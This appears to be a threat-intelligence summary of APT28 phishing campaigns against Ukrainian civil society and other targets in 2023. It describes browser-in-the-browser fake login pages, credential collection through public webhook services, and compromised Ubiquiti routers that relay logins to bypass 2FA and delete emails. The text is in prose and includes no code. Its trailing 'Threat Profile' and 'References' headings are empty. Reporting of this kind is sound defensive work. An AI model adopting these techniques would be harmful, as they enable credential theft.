Summary:
In May 2023, there were observations of APT28 employing various phishing techniques to target the Ukrainian civil society. Among these techniques were the utilization of HTTP webhook services like Pipedream and Webhook, as well as the compromise of Ubiquiti routers to illicitly obtain victims' credentials. The APT28 group was observed employing the "Browser in the Browser" technique, which involves presenting a counterfeit login page to the victim under the guise of decrypting a document.
Researchers detected an HTML file that was found to be impersonating the Ukrainian security think tank known as the Centre for Defence Strategies. The decoy document that was obtained aimed to deceive the victim into clicking on a button that would supposedly decrypt the content of the page. Upon clicking the button, a impersonated login window is displayed. Within this window, there exists an “iframe” that embeds a counterfeit UKR[.]NET login webpage. The objective behind this is to deceive the user into entering their credentials. Researchers have observed APT28 utilizing another technique for over a year, which involves incorporating public HTTP debugging/webhook services into their phishing webpages to collect stolen credentials. Consequently, APT28 operators do not need to establish any additional scripts or infrastructure to gather the credentials. They simply need to set up a webhook page on the service and patiently await the receipt of credentials from the victim. Throughout the investigation, specialists identified two services, PipeDream[.]com and Webhook[.]site, that were exploited by APT28. These services receive HTTP requests without requiring any user registration or sign-up process.
In the case of 2FA (Two-Factor Authentication) accounts, APT28 developed dedicated webpages hosted on domains. These webpages interact with a Python script running on compromised Ubiquiti routers. Most of the phishing domains that were observed were generated using free services and had a short lifespan, typically limited to a single campaign. When users entered their credentials on these phishing sites, the information was transmitted via an HTTP POST request to a remote IP address. It was discovered that the compromised Ubiquiti network devices were associated with this remote IP address. The Python script establishes interaction with the UKR[.]NET API to authenticate the user and circumvent the 2FA (Two-Factor Authentication) process. This aspect of the operation is particularly noteworthy. Another intriguing feature integrated into this script is its capability to delete the most recently received emails.
APT28, a known threat actor, was found to be involved in a credential harvesting phishing campaign that targeted private email addresses in the United States and Ukraine. During this campaign, researchers noted a consistent pattern of impersonation targeting a medium-sized business operating in the auto-manufacturing sector in Saudi Arabia.
Threat Profile:
References:
The following reports contain further technical details: